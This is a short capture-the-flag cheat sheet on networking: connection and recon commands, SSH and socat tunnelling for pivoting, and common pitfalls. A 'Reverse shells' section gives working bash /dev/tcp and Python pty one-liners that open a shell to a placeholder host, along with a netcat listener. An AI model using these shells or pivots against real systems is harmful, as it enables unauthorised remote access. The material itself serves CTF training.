networking::ctf

networking TCP · UDP pivoting · tunnels
Connectivity Tunnels & Shells
01Connectivity & Recon
Basic tools
nc host port
ncat --ssl host 443
curl -i URL
openssl s_client -connect host:443
dig @dns server name
nmap -sC -sV host
Useful questions
QuestionImpact
plain TCP or TLS?use nc vs ncat/openssl
line-oriented protocol?send newline and watch prompts
HTTP-ish?curl first before browser
UDP?use nc -u or socat
02Tunnels / Forwarding / Pivoting
SSH forwarding
ssh -L 8080:127.0.0.1:80 user@jump
ssh -R 9001:127.0.0.1:9001 user@jump
ssh -D 1080 user@jump

# local, remote, SOCKS
Socat / relays
socat TCP-LISTEN:4444,reuseaddr,fork TCP:target:80
socat file:`tty`,raw,echo=0 TCP:host:port

# handy for interactive raw services
Reverse shells
nc -lvnp 4444
bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1'
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("IP",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Pitfalls
IssueFix
copy/paste CRLF issuesprotocol may require exact newlines
wrong bind address127.0.0.1 vs 0.0.0.0 matters
TLS hidden behind TCP portopenssl s_client reveals it
proxy environmentcurl may behave differently than nc